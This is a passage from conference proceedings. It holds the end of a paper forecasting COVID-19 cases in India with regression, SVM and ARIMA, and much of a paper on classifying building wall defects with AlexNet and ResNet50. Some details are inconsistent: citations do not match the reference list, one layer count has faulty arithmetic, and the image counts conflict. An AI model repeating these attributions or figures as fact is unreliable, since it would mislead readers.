recent research conducted in [1]. Car et al. in May 2020 were to perform the valid
regression model through an AI algorithm using the dataset that they used in their
implementation. The main goal of the model is to discover all the gathered data
together, instead of splitting it into different locations, because ML can give insights
into the factors surrounding the spread of coronavirus and hence allows us to make
accurate predictions. In another paper in [2], Sujath et al. in May 2020 represented
a model that was helpful to analyze the spread of coronavirus. In this, authors have
done multilayer perceptron (MLP), vector autoregression (VAR), and LR strategy
to analyze the disease and movement of coronavirus cases in India. The MLP algo-
rithm showed better prediction outcomes as compared to the LR and VAR technique
utilizing Orange and WEKA. Tuli et al. in May 2020 represented a model which
used Generalized Inverse Weibull distribution, a well-fit can be achieved to make an
analyzed frame [3]. This used a platform like cloud computing for real-time predic-
tion and more accuracy of the virus spread behavior of the pandemic. They select
ML algorithm that can be executed easily on cloud platforms for correct predic-
tion and enterprise growth of reply by the citizens and political parties. Another
recent research in [2], the authors have analyzed the function of ML and AI as one
important procedure in the area of predicting, screening, contact detecting, antici-
pating, and drug advancement for the virus SARS-CoV-2 and its spread. This research
presented the diagnosis using an ML and AI on CT images (1020) of coronavirus,
which included the study on 108 contaminated patients alongside 86 viral pneu-
monia patients, and the authors used the convolutional neural network (Resnet-101)
for radiologist resulted in 83.33%, 86.27 of accuracy and specificity, respectively.
The research presents that 11 pertinent lists are taken out by using the random forest
Assessing Spatiotemporal Transmission Dynamics … 831

model with general correctness of 96.97% and 95.95%, respectively. In yet another
recent contribution, Rustam et al. in May 2020 formulated the ML models to estimate
the number of predicted patients suffered by coronavirus [4]. In this research, authors
used four models, includes least absolute shrinkage, LR, SVM, selection operator
(LASSO), and exponential. In [5], the authors Chaurasia and Pal in July 2020 were
predicting the further spread of this virus in our country by utilizing time-series data
to predict the number of deceased patients globally, and the work included time-
series predictive modeling by using various techniques, searching a best procedure
for analyzing on the coronavirus dataset and using the ARIMA algorithm for future
estimating of deceased rates globally. In paper [6] Khanday et al. in June 2020, they
divided textual clinical dataset into different parts by utilizing ensemble and classical
ML algorithms. They use NLP techniques like term frequency/inverse, report length,
bag of words (BOW), and document frequency for optimal feature engineering. They
used ensemble and traditional ML classifiers for transferring the features. Multino-
mial Naive Bayes and logistic regression showed good results as compared to other
ML models having 96.2% testing accuracy. Burdick et al. have created the model
for fitting “boosted” decision trees by utilizing the XGBoost classifier algorithm [7].
XGBoost classifier implements gradient boosting which uses an ensemble of clas-
sifiers that integrates outcomes from multiple decision trees to generate scores of
predictions. Each tree splits the patient number into little groups, successively. The
splitting continues until the patient reaches the leaf node which is either from one
class or another based on the value of features is above or below some threshold.
Jamshidi et al. in June 2020 gave a response on the spread of the virus by using DL
and AI analytics to achieve the target output which consist of generative adversarial
networks (GANs), extreme learning machine, and LSTM [8]. The main supremacy
of these AI applications is to expedite the procedure of treatment and diagnosis of
the coronavirus ailment.

3 Proposed Methodology

The following section summarizes the dataset and the proposed methodology for
prediction of COVID-19 trend in India.

3.1 Dataset Description

Table 1 shows the coronavirus data published by the Center of Systems Science
and Engineering (CSSE) at John Hopkins University [9]. The dataset consists of
273 rows and 384 columns shows worldwide instantaneous death, total cases, and
recovery along with latitude and longitude [10]. India, being the second largest in
world population, draws special attention of researchers to predict the COVID-19
trend [11]. Hence, another dataset, shown in Table 2, is extracted from Indian Ministry
832

Table 1 COVID-19 dataset of Countries Worldwide


Country/Region Lat Long 1/22/20 1/23/20 1/24/20 1/25/20 1/26/20 1/27/20 … 11/23/20 11/24/20 11/25/20 1/26/20 1/27/20
Afghanistan 33.93911 67.709953 0 0 0 0 0 0 … 44,988 45,174 45,384 45,600 45,723
Albania 41.15330 20.168300 0 0 0 0 0 0 … 33,556 34,300 34,944 35,600 36,245
Algeria 28.03390 1.659600 0 0 0 0 0 0 … 75,867 77,000 78,025 79,110 80,168
Andorra 42.50630 1.521800 0 0 0 0 0 0 … 6304 6351 6428 6534 6610
Angola −11.20270 17.873900 … 14,634 14,742 14,821 14,920 15,008
Antigua and 17.06080 −61.796400 0 0 0 0 0 0 … 139 139 140 141 141
Barbuda
Argentina −38.41610 −63.616700 0 0 0 0 0 0 … 1,374,631 1,381,795 1,390,388 1,399,431 1,407,277
Armenia 40.06910 45.038200 0 0 0 0 0 0 … 126,709 127,522 129,085 130,870 132,346
Australia −37.47350 149.012400 0 0 0 0 0 0 … 115 115 115 116 117
Australia −33.86880 151.209300 0 0 0 0 0 4 … 4548 4552 4552 4556 4564
M. Gupta et al.
Table 2 COVID-19 dataset of India
S No. Date Time State/Union Territory Confirmed Indian National Confirmed Foreign National Cured Deaths Confirmed
0 1 30/01/20 6.00 PM Kerala 1 0 0 0 1
1 2 31/01/20 6.00 PM Kerala 1 0 0 0 1
2 3 01/02/20 6.00 PM Kerala 2 0 0 0 2
3 4 02/02/20 6.00 PM Kerala 3 0 0 0 3
4 5 03/02/20 6.00 PM Kerala 3 0 0 0 3
Assessing Spatiotemporal Transmission Dynamics …

5 6 04/02/20 6.00 PM Kerala 3 0 0 0 3


6 7 05/02/20 6.00 PM Kerala 3 0 0 0 3
7 8 06/02/20 6.00 PM Kerala 3 0 0 0 3
8 9 07/02/20 6.00 PM Kerala 3 0 0 0 3
9 10 08/02/20 6.00 PM Kerala 3 0 0 0 3
833
834 M. Gupta et al.

of Health and Family Affairs containing seven months of coronavirus data in India
from January 30, 2020 to September 2, 2020. This dataset consists of 5861 rows and
9 distinct attributes.

3.2 Experimental Analysis and Prediction

The following section summarizes the concept of artificial intelligence analytics


including LR, SVM, and ARIMA.
(1) Linear Regression: In linear regression, there are independent variables and
dependent variables in which dependent variables are continuous in nature.
A relationship between the dependent and independent variable is linear and
hence is called linear regression. If there are two dataset points, i.e., X and
Y in the dataset, they are directly proportional to each other. It follows from
Eq. (1), a linear regression line is:

Y = BX + A (1)

In Eq. (1), Y is dependent variable, A & B are linear regression coefficients in (3),
X is an independent variable. The dependent variable refers to final output and X as
the confirmed cases. The goal of linear regression is to minimize the squared of the
residuals between the true prediction and observed prediction. Hence, it translated
to Eq. (4):

E = Y (i) − B X − A (2)

A = Ȳ − B X̄ (3)

    2
B̄ =  X − X̄ Y (i) − Ȳ / X − X̄ (4)

In Eq. (2), E is the residual or the difference between the predicted and actual
value, Y (i) is the true value of the data point, while Ȳ & X̄ represent the average
value of Y and X .
(2) Support Vector Machine (SVM): A support vector machine (SVM) is a super-
vised learning model used for classification to analyze the data for two-group
classification problems [12]. SVM uses two decision boundaries in the X–Y
graph which are linearly separable which is called a hyperplane. Margin is
the sum of the distances (Dˆ- + Dˆ + ) between the two decision boundaries.
For classifying the data points consider the hyperplane or decision boundary
which has a maximum width margin. Higher the width of the margin is better
Assessing Spatiotemporal Transmission Dynamics … 835

the accuracy. The value of the margin (m), || w || will be inversely proportional,
where w is the set of weight matrices. To maximize the margin, || w || have to
minimize.

||w||2
margin = Minimize (5)
2
There are two variants of SVM algorithms which are commonly used hard SVM
and soft SVM. Hard SVM: If the data is perfectly linearly separable, it is much
beneficial to use the hard SVM formulation that can quickly sketch up the decision
boundary.
 
y(i) w T X (i) − B ≥ 1 for all 1 < i ≤ n (6)

In the above (6), equation X (i) are the samples or data points and the Y (i) has
the output response where w is normal vector to the hyperplane. There is a second
equation used to handle the outliers, and it has less penalty on misclassified points
which is soft SVM formulation.

||w||2    
Minimize +C max 0, 1 − yi w T xi + b (7)
2 i

In the above eq. (7) C is the regularity parameter that balances the margin width and
missed penalty. Thus, the goal of the SVM formulation is to minimize the equation
specified in (7)
(3¢) Auto Regressive Integrated Moving Average (ARIMA): A group of models
that uses time-series data for better understandability and to predict the trends
of future based on its own values, referred as (p, q, d) where p, q, d are non-
negative numeric values which can be used to forecast future values. ARIMA
is a model that uses the dependent relationship between an observed sample
and some number of lagged observations [13, 14]. The step involves differ-
entiating of observed data point in order to make the time series stationary so
that it can be analyzed well. This model uses the dependence between data
and residual error from moving average model applied to lagged observations.

4 Results

In this research, we have used various AI analytics to predict the trend of coronavirus.
The algorithms that we used shown the results with accuracy were LR (98%), SVM
(72.45%), ARIMA (99.87%), and LSTM (42%) for prediction of the coronavirus. It
was observed that the ARIMA model is best as compared to all because it achieves
the maximum accuracy (99.87%). In this section, we have presented the prediction
of total cases of coronavirus by using confirmed cases, recovery, and death cases as
836 M. Gupta et al.

Fig. 1 Active, recovered, deaths in hotspot Countries till January 2021

our dominant features. In Fig. 1, we have shown the total active, cured, death cases
in hotspot countries (China, India, United Kingdom, France, US, and Italy). We have
later focused our research of coronavirus trend prediction for India and examined
the timeline of the confirmed, recovered, and death rates due to coronavirus in India
(Fig. 2). Our results show predicted total cases of India from the date, i.e., January
29, 2021 to February 2, 2021, with average 99.87% accuracy. The predicted cases
were found according to confirmed cases from January 24, 2021 to January 28, 2021.
In Fig. 3, we have shown the regression line which we observed, predicted total cases
given date-wise for next 15 days till 19th Feb. In Fig. 4, we have shown the predicted

Fig. 2 Total confirmed,


active, death rate in India
from March 2020 to Jan
2021
Assessing Spatiotemporal Transmission Dynamics … 837

Fig. 3 Cumulative trend


prediction of confirmed cases
for next 15 days till Feb 2021

Fig. 4 Cumulative trend


prediction of confirmed
cases for next 120 days till
May 2021

cases for the next 120 days, first it shows actual data of total cases from Jan 2020 to
Jan 2021. Secondly, it shows the predicted data from Jan to 120 days till May 2021.

5 Conclusion

Our research has presented various artificial intelligence techniques to predict the
trend of coronavirus in India. The models used include LR, SVM, LSTM recur-
rent networks, and ARIMA models. The forecast was done dependent on confirmed,
cured, and deceased cases. The results are also presented graphically for better under-
standability of predicted results. The AI analytics that we used shown the results with
accuracy were LR (98%), SVM (72.45%), ARIMA (99.87%), and LSTM (42%) for
prediction of the coronavirus. Linear regression and ARIMA model give the best
results with maximum accuracy (98 and 99.87%, respectively) and performed better
838 M. Gupta et al.

with existing to counter parts. As future research direction, we will be developing


specialized DL models, including MLP and autoencoders for trend prediction with
better accuracy.

References

1. Magazzino, C., Mele, M., & Schneider, N. (2021). A Machine Learning approach on the rela-
tionship among solar and wind energy production coal consumption GDP and CO2 emissions.
Renewable Energy, 167, 99–115.
2. Kavadi, D. P., Patan, R., Ramachandran, M., & Gandomi, A. H. (2020). Partial derivative
nonlinear global pandemic machine learning prediction of Covid 19. Chaos, Solitons &
Fractals, 139, 110056.
3. Sharma, S. (2020). Drawing insights from COVID-19-infected patients using CT scan images
and machine learning techniques: A study on 200 patients. Environmental Science and Pollution
Research, 27(29), 37155–37163.
4. Tuli, S., Tuli, S., Tuli, R., & Gill, S. S. (2020). Predicting the growth and trend of COVID-19
pandemic using machine learning and cloud computing. Internet of Things, 11, 100222.
5. Chaurasia, V., & Pal, S. (2020). Covid-19 pandemic: Application of machine learning time
series analysis for prediction of human future. Available at SSRN 3652378.
6. Lalmuanawma, S., Hussain, J., & Chhakchhuak, L. (2020). Applications of machine learning
and artificial intelligence for Covid-19 (SARS-CoV-2) pandemic: A review. Chaos, Solitons
and Fractals, 110059.
7. Rustam, F., Reshi, A. A., Mehmood, A., Ullah, S., On, B.-W., Aslam, W., & Choi, G. S.
(2020). COVID-19 future forecasting using supervised machine learning models. IEEE Access,
8, 101489–101499.
8. Nayak, J., Naik, B., Dinesh, P., Vakula, K., Kameswara Rao, B., Ding, W., & Pelusi, D. (2021).
Intelligent system for COVID-19 prognosis: A state-of-the-art survey. Applied Intelligence,
1–31.
9. Gujral, H., & Sinha, A. (2021). Association between exposure to airborne pollutants and
COVID-19 in Los Angeles, United States with ensemble-based dynamic emission model.
Environmental research, 194, 110704.
10. COVID-19 Data Repository by the Center for Systems Science and Engineering (CSSE) at
Johns Hopkins University.
11. COVID-19 India dataset, data extracted from Ministry of health and family affairs.
12. Sinha, A., & Rathi, M. (2021). COVID-19 prediction using AI analytics for South Korea.
Applied Intelligence, 1–19.
13. Sharma, R. R., Kumar, M., Maheshwari, S., & Ray, K. P. (2020). EVDHM-ARIMA-based
time series forecasting model and its application for COVID-19 cases. IEEE Transactions on
Instrumentation and Measurement, 70, 1–10.
14. Singh, S., Chowdhury, C., Panja, A. K., & Neogy, S. (2021). Time series analysis of COVID-19
data to study the effect of lockdown and unlock in India. Journal of The Institution of Engineers
(India): Series B, 1–7.
Detection of Building Defects Using
Convolutional Neural Networks

Dokuparthi Sai Santhoshi Bhavani, Abhijit Adhikari, and D. Sumathi

Abstract Deep learning has intervened almost in all domains. Apart from various
fields, researchers introduce the implementation of deep learning techniques in
several phases like detecting the damages, predicting the robustness of the repair
mortars, and various other activities. The crucial and significant task of building
maintenance is to detect the damages in the wall surface at an early stage. The issue
is found to be complex when the size of the buildings is huge in number. Hence,
many maintenance engineers and researchers look forward to a better solution. The
objective of this work is to locate the types of several issues that have been encoun-
tered during the construction phase. This work focuses on the four major defects as
spalls, flakes, cracks, and molds. The proposed model worked on ResNet50 on the
dataset that consists of 555 images for training and 176 for the test dataset. Detection
of type of defects is also handled with this model. An accuracy of 81% with a loss
of 0.02 has been obtained through the model deployment. This approach is found to
be robust and provides accurate results.

Keywords Convolutional neural networks (CNN) · Computer vision tasks ·


Rectified linear unit (ReLU) · Residual neural network (ResNet) · AlexNet ·
VGG16 · ImageDataGenerator · Keras · Feature extraction · Preprocessing

D. S. S. Bhavani (B) · A. Adhikari · D. Sumathi


VIT-AP University, Amaravati, India
e-mail: bhavani.bokuparthi@vitap.ac.in
A. Adhikari
e-mail: abhijit.adhikari@vitap.ac.in
D. Sumathi
e-mail: sumathi.d@vitap.ac.in

© The Author(s), under exclusive license to Springer Nature Singapore Pte Ltd. 2022 839
D. Gupta et al. (eds.), Proceedings of Second Doctoral Symposium on Computational
Intelligence, Advances in Intelligent Systems and Computing 1374,
https://doi.org/10.1007/978-981-16-3346-1_68
840 D. S. S. Bhavani et al.

1 Introduction

The field of civil engineering has an extensive range of issues associated with plan-
ning wastewater treatment plant functioning [1], modeling the stress–strain associa-
tions [2], and other designs of architecture [2] that could be solved by the application
of deep learning algorithms. Among the various activities, the construction of build-
ings has been increased due to the population growth that results in high-rise build-
ings, especially apartments. The construction business is growing tremendously as
par with the technology irrespective of huge costs in building materials. Most of them
construct buildings by mixing concrete powder instead of using sand which is a low
budget to build and to acquire good profits. Due to this, the conditions of the building
might deteriorate in the future, and there are chances of defects like cracks and spalls.
This is the predominant issue that arises frequently that needs to be resolved. All the
constructed buildings are high-rise buildings; it would be very difficult to identify the
building defects manually which is a time-consuming process. So, to overcome this
problem, deep learning and machine learning image analysis algorithms have been
used where it will identify the type of building defect it refers to by analyzing the
image. A genetic algorithm and percolation model have been proposed by Qu et al.
[3, 4]. In this, the authors have worked on the model for the detection of cracks on
the concrete pavement beneath several noises. In [5], the Zernike moment operator
works behind the crack width detection approach. Here, dual-scale CNN has been
deployed for the detection of the crack’s width. A crack detection approach based on
the deep convolutional neural architecture has been suggested in [6] which combines
the multiscale and several levels of information about the target object.
In 2020, Qu et al. [7] crack detection has been done through the deployment of
the convolutional neural network. As the first step, the cracks have been classified
with the help of various deep learning models. Considering the low percentage of
effective concrete pavement crack images in the mass images that are composed with
the crack detection vehicle, modification is done on the output dimension before the
detection of the crack. The efficiency has been augmented by scaling the network
model horizontally, and also the convolution layer is accessed with the kernel size
of 1 × 1, 3 × 3. It is compared with the VGG16 network [8] and from which it has
been observed that it is not so capable enough as they used only cracks for detection.
An updated model of the VGG16 network has been proposed by the authors in the
present work. This model employs ResNet50 in which there are several network
layers. These layers are used to extract the features from images using CNN.
In ResNet [9], it is allowed to train the neural network layers about 152 layers.
There are about three models in ResNet, i.e., ResNet18, ResNet50, and ResNet152.
We implemented ResNet50 in our model and the detection is done. The main advan-
tage of using this model is that ResNet50 has a concept of using the skip connection
as illustrated in (Fig. 1) [10], where it skips the connection accurately and it is only
done before the ReLU activation function to acquire the better accuracy. We gener-
ally use two different blocks in ResNet50. If the input size is equal to the output size,
Detection of Building Defects Using Convolutional Neural Networks 841

Fig. 1 Skip connection in ResNet in identity block and convolution block

then we use identity block, otherwise, convolution block is used. In the convolution
block, an extra convolution layer is added in the skip connection.
Figure 2 represents the architecture of ResNet50 [11], where it consists of four
stages of identity blocks. The input layer has a 7 × 7 filter size of such 64 filters with
a max pooling layer of 3 × 3 filter size of stride 2. In each stage of the identity block,
three layers are used. In stage 1, in the first layer, 64 filters with the filter size of 1 ×
1 have been deployed, in the second layer, we use 64 filters with the filter size of 3 ×
3, and in the third layer, 256 filters with the filter size of 1 × 1 are used. Stage 1 will
be done three times. So, here a total of nine layers has been obtained (3 layers × 3
times = 12). In stage 2, in the first layer, 128 filters with the filter size of 1 × 1, in the
second layer 128 filters with the filter size of 3 × 3, in the third layer 512 filters with
the filter size of 1 × 1 have been deployed. Stage 2 will be done four times. Here, a
total of 12 layers (3 layers × 4 times = 12) has been achieved. In stage 3, in the first
layer, 256 filters with the filter size of 1 × 1, in the second layer 256 filters with the
filter size of 3 × 3, in the third layer 1024 filters with the filter size of 1 × 1 have
been used. Stage 3 will be done six times. Therefore, a total of 18 layers (3 layers
× 6 times = 18) is the output. In stage 4, in the first layer, 512 filters with the filter
size of 1 × 1, in the second layer 512 filters with the filter size of 3 × 3, and in the
third layer, 2048 filters with the filter size of 1 × 1 have been implemented. Stage 4
will be done three times. Subsequently, we get a total of nine layers (3 layers × 3
times = 9). The output layer is fully connected. It uses max pooling and softmax as
842 D. S. S. Bhavani et al.

Fig. 2 Architecture of ResNet50

an activation function. So, the total layers used in architecture of ResNet50 are 1 +
9 + 12 + 18 + 9 + 1 = 50 layers.
The architecture of AlexNet:
AlexNet [12, 13] is one of the algorithms used to solve the problem of image clas-
sification. It consists of 60 million parameters. If the input size of an RGB image is
256 × 256, then all the images of the training and testing set would be an image size
of 256 × 256. The architecture of the AlexNet is shown in the figure.
From the architecture shown in Fig. 3, we can observe that AlexNet consists
of 1 softmax layer, 2 fully connected layers, 3 overlapping max pooling layers, 2
Detection of Building Defects Using Convolutional Neural Networks 843

Fig. 3 Architecture of
AlexNet
844 D. S. S. Bhavani et al.

normalization layers, and 5 convolutional layers. Each convolution layer of the same
image size has a different number of kernels. If we perceive the architecture, initially,
a convolution layer of stride = 4 with 96 kernels of size 11 × 11 has been used by
overlapping the max pooling layers of size 3 × 3 with stride = 2 which follows next.
Then, again a convolution layer of size 5 × 5 of 256 kernels with padding size =
2 has been done. It again follows the overlapping max pooling layer of stride = 2
with the image size of 3 × 3. Then, three convolution layers of 384 kernels of size 3
× 3 with padding size of 2 have connected directly to each other. Adjacent follows
an overlapping max pooling layer of size 3 × 3 with stride = 2. Now, about two
fully connected layers of 4096 units follow with an output layer, 1000-way softmax.
It gives the distribution of about 1000 class labels. Each convolution layer contains
the convolution filters along with a nonlinear activation function, i.e., ReLU [14].
After every convolution layer and the fully connected layer, ReLU is applied. Before
the two fully connected layers, dropout is applied. Dropout is a method introduced
by G. E. Hinton where a neuron will be dropped from a network so that it cannot
contribute either in the forward propagation or backward propagation. This increases
the number of iterations, and without dropout, our model would overfit significantly.
The input size of an image would be 227 × 227 × 3 due to padding. The accuracy
obtained through this AlexNet model is comparatively poor. Hence, this results in
deploying another model to improve the detection rate. The objective of the research
is to devise a model based on deep learning techniques to automate the maintenance
process. The major objective of this research therefore is set to investigate the novel
application of the deep learning method of convolutional neural networks (CNN)
in automating the condition assessment of buildings. The focus is to automate the
detection and localization of key defects arising from dampness in buildings from
images. This paper has been initiated with a brief overview of the related works that
have been focused on various techniques. The next section has been focused on the
scope of the work followed by the proposed methodology. Experimental analysis
and results have been discussed in the next session. The last section provides the
conclusion and future enhancement.

2 Literature Survey

CNN techniques are widely used for image processing and the objective of this
algorithm is to predict the various building defects.
Qu et al. [7] has proposed a model based on crack detection using CNN. He
used VGG16 for optimization of the model to extract the features of characteristics
of cracks. Qu et al. have developed the model based on cracks using the LeNet-5
network. Qu et al. mentioned that using this model, accurate identification of the
cracks of concrete pavements from various characteristics types of disturbances by
training the model has been done. The paper concluded that to upgrade the effective-
ness of detection of cracks Qu et al. would use the YOLO v3 series to improve the
rate of detection. But LeNet-5 is not so capable enough as they used only cracks for
Detection of Building Defects Using Convolutional Neural Networks 845

detection. Instead, we proposed a model based on ResNet where multiple network


layers have been used to extract features from images using CNN. It is also an updated
model to the LeNet-5 network which was introduced in the year 2015.
Perez et al. [15] has also implemented the CNN techniques to detect the building
defects like mold, deterioration, and strain by using the VGG16 network for classi-
fying. In this paper, it is mentioned that Perez et al. have done localization of object by
using class activation mapping (CAM) and implemented only three building defects,
i.e., mold, strain, and deterioration by using the VGG16 network. The work is also
compared with other models like ResNet50 and Inception. But, the accuracy of the
model is accurately done in VGG16 with 97.83% of training and about 98.86% of
validation/testing accuracy. Apart from this, Husein Perez et al. paper will be more
capable if Husein Perez et al. used the other building detects like cracks, spalls,
flakes, etc., which would be very efficient for his model.
Kong et al. [16] has proposed a model of monitoring the health of the building by
using the sensors that are present inside the smartphone. Kong et al. have discussed
how the computer vision algorithm is implemented. The study has surveyed many
commercial and also residual buildings. During the small earthquakes, the results
have tried to illustrate the capacity to extract the different frequencies from the
buildings of upper levels. In this research, the main aim is to monitor the defect of
the building using a smartphone which is a good idea but not so useful in all cases.
Instead, the model has been proposed by adding another feature to it, i.e., drones.
The objective of the drones is to record that makes it easy and more compatible for
us to monitor the health of the buildings, especially in the case of high-rise buildings
in real-life applications.
Zhu et al. [17] has identified a vision-based method of building defect detection
for bridges by using CNN and transfer learning. The results have been compared
with other studies based on the machine learning algorithm and illustrated that their
approach shows better accuracy and efficiency of performance. But, Zhu et al. used
CNN and transfer learning to their model to detect the defects of only bridges; instead,
Zhu et al. have also used this model for the detection of building defects so that the
condition of the building could be monitored.
Zhong et al. [18] has also proposed a model based on CNN by using deep learning
techniques to classify the quality problems of the building industry in China for the
health and safety of the people. The authors have discussed the quality problems by
comparing using a classifier, i.e., support vector machine and Bayes-based. From the
survey, the results showed that the model has performed well with the implementation
of the CNN-based approach. Apart from checking the quality problems only in the
building industry, they have used the same model to detect the bridges.

3 Scope of Work

The work has mainly focused on detecting the building defects and surveys have
been conducted related to it. Based on the literature survey, in an existing system,
846 D. S. S. Bhavani et al.

there are many models to detect the defect of the building. Many models have been
deployed to detect the defects of a building. Also, the existing approaches are not so
capable of detecting the defects. To detect the building defects, we have deployed
models based on AlexNet and ResNet50 which will detect accurately than the existing
approaches. The combination of the deep learning technique—CNN architecture and
image visualization technique ResNet50 has been implemented here to augment the
accuracy. This section provides information about the architecture of AlexNet.

4 Proposed Algorithm

The proposed system that is shown in Fig. 4 aims to detect the defects in a building
which will reduce the human manual checking. Whenever there is a defect, i.e., spall
or crack in the building, the human needs to capture the defect and send the images
from the place they live. It has been inferred from various works that the deployment
of CNN could solve the various issues in computer vision. The main advantage of the
deployment of CNN in this work is that the detection of cracks is easier without human
intervention. Among the architectures, we have applied ResNet50 to determine the
defect types. The proposed model is shown in Fig. 4.

Fig. 4 Block diagram of the proposed model


Detection of Building Defects Using Convolutional Neural Networks 847

Algorithm
Step 1—START.
Step 2—Select an image as input to the model.
Step 3—Image processing will be done by using different layers.
Step 3a—Initially import the package Sequential so that all the packages will be
sequentially imported.
Step 3b—Then, image processing will be done using the package Convolution2D
to extract the features of the image. Then, the activation function—ReLU is used to
activate the neurons.
Step 3c—In the next step, the image pooling will be done using the package
MaxPooling2D. Here, the feature map is generated when the image is pooled.
Step 3d—The generated feature map will be converted into the size 1-dimensional
using the package Flatten.
Step 4—The model will be added into the dense layer where three layers will be
present in it, i.e., input layer, hidden layer, output layer sequentially.
Step 5—Training and testing of the model by generating our data using the package
ImageDataGenerator.
Step 6—Compiling the model using an optimizer.
Step 7—Importing the package ResNet50.
Step 8—Again training and testing the model.
Step 9—Connecting our model to the Flask, to access the Web application.
Step 10—END.

4.1 Method

The significant feature of CNN is that it has the properties like dimensionality reduc-
tion and the reduction in parameters. Computation is decreased due to the sharing
of the parameter. Additionally, the learning that is acquired in one part of the image
is utilized in the other part of the image. Dimensionality reduction plays a vital role
in the reduction of the computation power. These are the reasons that contributed to
the deployment of CNN in detecting the defects in the building.

4.2 Importing Building Libraries, Layers, and Their Working

In this work, initially, the model processes the image by using the various functions
in Keras like Sequential, Dense, Convolution2D, MaxPooling2D, and Flatten. The
detailed role of each function is given below.
Sequential—This function allows the network layers sequentially from the input
image to the predicted output.
848 D. S. S. Bhavani et al.

Convolution2D—It extracts different features of an image using the small squares


of the input data. It takes an image filter and a kernel or a filter as an input [19].
MaxPooling2D—It takes the maximum value from the feature map to get the
most important features of the output feature map.
Figure 5 represents the working of the max pooling layer. Using this layer, it
selects the maximum value from each square and gives the output of the pooled
feature map. Max pooling layer is implemented as shown in Fig. 6. The dimensions
of the output image that is to be converted are used in the max pooling layer.
Flatten—It helps the data to convert into a one-dimensional array to give input to
the next layer.
Figure 6 shows the working of the Flatten layer. Here, the output of the pooled
feature map will be converted into a one-dimensional array by using the layer, Flatten.
Dense—It is a fully connected neural network layer where each network layer is
connected to the next network layer. Here, each input node is connected to the other
output node.
The accuracy of the model is 81%. ResNet50 has been deployed to our model to
get good results. Finally, the proposed model has been loaded into the implementation
of Flask which is used to develop our Web application.

Fig. 5 Working of max pooling layer

Fig. 6 Working of flatten


layer
Detection of Building Defects Using Convolutional Neural Networks 849

5 Experimental Analysis

A. Implementation

In this work, Python on Jupyter Notebook and Spyder applications has been
implemented. HTML is used in the Spyder application to create a Web page using
Flask. In this model, evaluation is done on a separate set of 455 images in the training
dataset and 146 images in the test dataset. Initially, the AlexNet model is deployed
and evaluation is done. The confusion matrix obtained is shown in Fig. 7. From
Fig. 8, the classification report is used to determine the metrics such as precision,
recall, and F1-score.
Train loss vs validation loss and train accuracy versus validation accuracy are
shown in Fig. 9. From Fig. 9, it has been observed that the validation accuracy is less
than the training accuracy. There might be few reasons like the small validation set
and unbalanced dataset. As to improve the accuracy and reduce the loss, ResNet50
has been deployed. The evaluation test showed a consistent overall accuracy of 81%
(Fig. 10), and 90% of images were correctly classified.
In this model, initially, we have applied deep learning techniques and trained
our model. Then, we loaded this model in ResNet50 implementation and trained the
model again. Figure 10 shows accuracy when the ResNet50 model was implemented.
The model has also been evaluated based on the various performance metrics, such as
precision, recall, and F1-score. Figure 11 shows the metrics for the deployed model.
We saved our model and again we loaded it in the Flask implementation which is
used to develop a Web application.

Fig. 7 Confusion matrix


850 D. S. S. Bhavani et al.

Fig. 8 Classification report

Fig. 9 Accuracy and loss of


AlexNet architecture
Detection of Building Defects Using Convolutional Neural Networks 851

Fig. 10 Accuracy after


ResNet50 model is
implemented

Fig. 11 Metrics

5.1 Results

As we proposed, our results indicated reasonable accuracy of our system in iden-


tifying the flakes, spalls, and cracks on walls of a building (Figs. 12, 13, 14 and
15).

5.2 Discussion

This work serves the predominant issue faced by the clients. As the detection of
the defects in the building is a complicated task, detection has been done with the
852 D. S. S. Bhavani et al.

Fig. 12 Prediction of a building defect flakes

Fig. 13 Prediction of a building defect spalls

deployment of the deep learning algorithms. These defects occur mainly in high-
rise buildings, and the main defects were cracks, spalls, and flakes. These defects
were caused due to (1) the moisture problems of the environment such as wind,
temperature, and rain, (2) improper quality in the standards of building construction,
(3) walls showing discoloration like brown or a yellow tainted stain, (4) improper
ventilation may also lead to the building defects at walls, ceiling, floors, and roof,
and (5) damages in the foundation. Some examples of building defects are leaks
Detection of Building Defects Using Convolutional Neural Networks 853

Fig. 14 Prediction of a building defect cracks

Fig. 15 Information about the mentioned building defects

in common areas like windows/doors/roofs, moisture problems due to improper


waterproofing, and discoloration on walls.
854 D. S. S. Bhavani et al.

6 Conclusion and Future Scope

This work mainly focused on the detection of types of defects in the building. Auto-
mated detection of cracks has been done through the deployment of ResNet50. This
classification problem takes images of size 224 × 224 × 3 as our dataset. In this
work, 555 images have been considered for training and 176 images for the test
dataset. The model has run on 25 epochs, and the accuracy recorded is 81% with
0.02 loss on the training set and 83% validation accuracy with 0.01 loss. The overall
performance of this work showed reliability and flexibility in the classification of
the type of defects. This work is mainly focused on the four defects, namely cracks,
flakes, spalls, and molds. This work has various limitations in the dataset since it
possesses only images with visible defects. Additionally, the type of images taken
for consideration could have various backgrounds, and the edges shall be made clear.
The model could be enhanced in such a way that it could be compatible in providing
good results.

References

1. Sànchez–Marrè, M., Cortés, U., Roda, R. I., Poch, M., & Lafuente, J. (2002, December
17). Learning and adaptation in wastewater treatment plants through case–based reasoning.
Retrieved January 31, 2021 from https://onlinelibrary.wiley.com/doi/abs/https://doi.org/10.
1111/0885-9507.00061
2. Borner, K. (Ed) .(1995). Modules for design support. Technical Report FABEL-Report No. 35.
GMD, Sankt Augustin, Germany
3. Penumadu, D., Agrawal, G., & Chameau, J. (1992, May 01). In J. Ghaboussi, J. H. Garrett Jr.
& X. Wu (Eds.), Discussion of knowledge-based modeling of material behavior with neural
networks (January, 1991, Vol. 117, No.1). Retrieved January 31 2021 from https://ascelibrary.
org/doi/abs/10.1061/%28ASCE%2907339399%281992%29118%3A5%281057.2%29
4. Qu, Z., Chen, Y.-X., Liu, L., Xie, Y., & Zhou, Q. (2019). The algorithm of concrete surface
crack detection based on the genetic programming and percolation model. IEEE Access, 7,
57592–57603.
5. Qu, Z., Chen, S.-Q., Liu, Y.-Q., & Liu, L. (2019). Eliminating lining seams in tunnel concrete
crack images via line segments’ translation and expansion. IEEE Access, 7, 30615–30627.
6. Ni, F. T., Zhang, J., & Chen, Z. Q. (2019, may) Zernike-moment measurement of thin-crack
width in images enabled by dual-scale deep learning. Computer-Aided Civil Information,
34(50), 367–384.
7. Liu, Y., Yao, J., Lu, X., Xie, R., & Li, L. (2019). DeepCrack: a deep hierarchical feature learning
architecture for crack segmentation. Neurocomputing, 338, 139–153.
8. Qu, Z., Mei, J., Liu, L., & Zhou, D. Y. (2020). Crack detection of concrete pavement with cross-
entropy loss function and improved VGG16 network model. IEEE Access, 8, 54564–54573.
